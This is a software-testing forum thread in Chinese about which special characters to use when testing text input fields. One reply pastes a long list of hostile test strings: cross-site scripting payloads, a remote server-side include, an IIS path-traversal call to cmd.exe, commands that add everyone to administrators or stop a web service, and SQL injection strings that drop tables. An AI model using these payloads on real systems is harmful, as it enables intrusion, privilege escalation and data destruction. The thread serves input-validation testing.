51Testing软件测试论坛
标题:
测试文本输入时常用到的特殊字符有哪些?
[打印本页]
作者:
kevinll
时间:
2006-11-7 14:48
标题:
测试文本输入时常用到的特殊字符有哪些?
测试文本输入时常用到的特殊字符有哪些?我想到了:_user,
test_user_,
‘user’,
“user123\~!@#$%^&*()_+/?|{[,
Test user,
User,
 ,
还有哪些呢?
作者:
wuhuawu09
时间:
2006-11-7 14:59
有-(连字符和"_"在一个键上),……(省略号)还有中文状态下的标点、特殊字符(—,¥,)、括号(大,中,小)、、(顿号)等
作者:
kevinll
时间:
2006-11-7 15:10
thx!
作者:
yangkinki
时间:
2006-11-7 16:41
~!`@#$%^&*()_+|[]-=\{};':"<>?,./~!·#¥%…&*()—+|`-=、[]{};‘:“,。/《》? 这些都属于特殊字符
作者:
小南
时间:
2006-11-7 18:03
MSFT%22>document.write(%22This%20page%20has%20the%20HTML%20security%20bug!%22);document.close();
<TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
%3CTABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
<TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
%3CTABLE%3E%3CTR%3E%3CTD%3Ecolumn%201%20row%201%3C%2FTD%3E%3C%2FTR%3E%3C%2FTABLE%3E
<img src=javascript:alert(document.domain)>
<img src%3Djavascript:alert(document.domain)>
TABLE><TR><TD>column 1 row 1</TD><%2FTR>/TABLE>
TABLE><TR><TD>column 1 row 1</TD></TR></TABLE
TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
<TABLE><TR><TD>column 1 row 1</TD></TR></TABLE
%25%33%43TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
<!--# include virtual="http://matrixsrv4/testhack/test.inc" -->
%3C%21%2D%2D%23%20include%20virtual%3D%22http%3A%2F%2Fmatrixsrv4%2Ftesthack%2Ftest%2Einc%22%20%2D%2D%3e
<!--%23 include virtual="http://matrixsrv4/testhack/test.inc" -->
<!--# include virtual="http://matrixsrv4/testhack/test.inc
%23 include virtual="http://matrixsrv4/testhack/test.inc -->
<%@ Language=VBScript %
<%@ Language=VBScript %>
<%25@ Language=VBScript %>
<%25@ Language=VBScript %
%25%33%43%@ Language%25%33%44VBScript %>
<script language="Javascript" src="http://map.geoup.com/geoup"></script>
<script language="Javascript" src="http://map.geoup.com/geoup"><script>
script language="Javascript" src="http://map.geoup.com/geoup"></script>
<script language="Javascript" src="http://map.geoup.com/geoup"></script
%3Cscript%20language="Javascript" src="http://map.geoup.com/geoup"></script>
%3Cscript%20language="Javascript" src="http://map.geoup.com/geoup"></script
MsgBox "U R Hacked"
%25%33%43script language="Javascript" src="http://map.geoup.com/geoup"></script>
%25%33%43script language="Javascript" src="http://map.geoup.com/geoup"></script
%25%3343script language="Javascript" src="http://map.geoup.com/geoup"></script
set path=c:\hacked
http://%computername%/scripts/..%c0%af../winnt/system32/cmd.exe
net stop w3csvc
%22C:%5CDocuments%20and%20Settings%5C%25username%25%5CDesktop%5Chak.bat%22
net localgroup administrators everyone /add %3E c:\addadmin.log
Sql’’INSERT INTO database.tablename1 (column names) SELECT * FROM database.tablename2 --
Sql’’INSERT INTO database.tablename (column name, column name) '980832','yatta yatta' --
Sql’’CREATE database.tablename (table element list) --
Sql’’DROP TABLE database.tablename --
Sql’’DROP VIEW database.view --
Sql’’DROP PROCEDURE database.procedure --
Sql’’UPDATE database.tablename SET columnname = 0 --
<!-- Body --> <!ELEMENT body (tu*) > <!-- No attributes -->
%3C%21-- Body --> <!ELEMENT body (tu*) > <!-- No attributes -->
<!-- Body -- <!ELEMENT body (tu*) > <!-- No attributes -->
!-- Body --> <!ELEMENT body (tu*) > <!-- No attributes -->
<!-- Body --> <!ELEMENT body (tu*) > <!-- No attributes --
<!-- Body -- <!ELEMENT body (tu*) > %3C!-- No attributes --%3E
%25%33%43%2521-- Body --> <!ELEMENT body (tu*) > <!-- No attributes -->
%3C%21%2D%2D%20Body%20%2D%2D%3E%20%3C%21ELEMENT%20body%20%20%20%20%28tu%2A%29%20%3E%20%3C%21%2D%2D%20No%20attributes%20%2D%2D%3E
%21%2D%2D%20Body%20%2D%2D%3E%20%3C%21ELEMENT%20body%20%20%20%20%28tu%2A%29%20%3E%20%3C%21%2D%2D%20No%20attributes%20%2D%2D%3E
%3C%21%2D%2D%20Body%20%2D%2D%3E%20%3C%21ELEMENT%20body%20%20%20%20%28tu%2A%29%20%3E%20%3C%21%2D%2D%20No%20attributes%20%2D%2D
0xF900 0xFFFE
<!-- Body --> <!ELEMENT body (tu*) > <!-- No attributes -->
<!-- Body --> <!ELEMENT body (tu*) > <!-- No attributes -->
#
0.23
:
%3A
\
%5C
?
%3F
*
%2A
<
%3C
>
%3E
%
0.25
/
%2F
|
%7C
"
0.22
~
%7E
lbot~/%2f?url%26
http://www:microsoft.com
http%3A%2F%2Fwww%2Emicrosoft%2Ecom
http%25%33%41%25%32%46%25%32%46www%25%32%45microsoft%25%32%45com
ftp://(enter
valid address)
ftp%3A%2F%2F(enter valid address)
ftp%25%33%41%25%32%46%25%32%46(enter valid address)
file://C:\WINNT\system32\inetsrv\iisadmin\default.asp
file%3A%2F%2FC%3A%5CWINNT%5Csystem32%5Cinetsrv%5Ciisadmin%5Cdefault.asp
file%25%33%41%25%32%46%25%32%46C%25%33%41%25%35%43WINNT%25%35%43system32%25%35%43inetsrv%25%35%43iisadmin%25%35%43default%25%32%45asp
https://(enter
valid https address)
http%73%3A%2F%2F(enter valid https address)
http%25%73%25%33%41%25%32%46%25%32%46(enter valid https address)
gopher://(enter
valid address)
telnet (enter address)
mailto://aaronspa@microsoft.com
mailto%3A%2F%2Faaronspa%40microsoft%2Ecom
mailto%25%33%41%25%32%46%25%32%46Caaronspa%2540microsoft%25%32%45com
news://(newsgroup)
http:://www.microsoft.com
http%3A%3A%2F%2Fwww%2Emicrosoft%2Ecom
http://www:microsoft.com
http%3A%2F%2Fwww%3Amicrosoft%2Ecom
http:/www.microsoft-com
http%3A%2Fwww%2Emicrosoft%2Dcom
http//microsoft.com
http%2F%2Fmicrosoft%2Ecom
http://.microsoft.com
http%3A%2F%2F%2Emicrosoft%2Ecom
http://microsoft..com
http%3A%2F%2Fmicrosoft%2E%2Ecom
file://C::\WINNT\system32\inetsrv\iisadmin\defaul.aspt
file://C:\WINNT\system32\inetsrv\iisadmin\defaul.text
file://C:\WINNT\system32\inetsrv\..\iisadmin\defaul.asp
\b
%5C%62
\f
%5C%66
\n
%5C%6E
\r
%5C%72
\t
%5C%74
\'
%5C%27
\"
%5C%22
break
return:
delete
strcopy
©
®
™
Dáta
£
¥
₣
¡
ﻼ
;
%3B
作者:
loveryanli
时间:
2006-11-7 19:17
所有涉及Sybase数据库Query的时候,输入',必定报错,屡试不爽,呵呵
作者:
kevinll
时间:
2006-11-8 11:15
小南 :不太明白你的意思
作者:
wuhuawu09
时间:
2006-11-8 11:32
也许 小南 是告诉你各种语言用到的字符(包括数据库用到的语句)和其它转意字符吧
作者:
nightbossa
时间:
2006-11-8 16:29
谢谢小南.收藏先...
作者:
getfly
时间:
2007-10-24 15:20
所有涉及Sybase数据库Query的时候,输入',必定报错,屡试不爽.
这句话太对了,我以前怎么就没有发现这个符号有这么大的用处呢
作者:
zhang1987yuan
时间:
2009-5-6 16:41
标题:
特殊字符要不要因具体的而分类啊???
俺是新手,可是我觉得特殊字符的输入是不是要按不同的要求划分开啊 ??比如用户名的输入和日期的输入。
欢迎光临 51Testing软件测试论坛 (http://bbs.51testing.com/)
Powered by Discuz! X3.2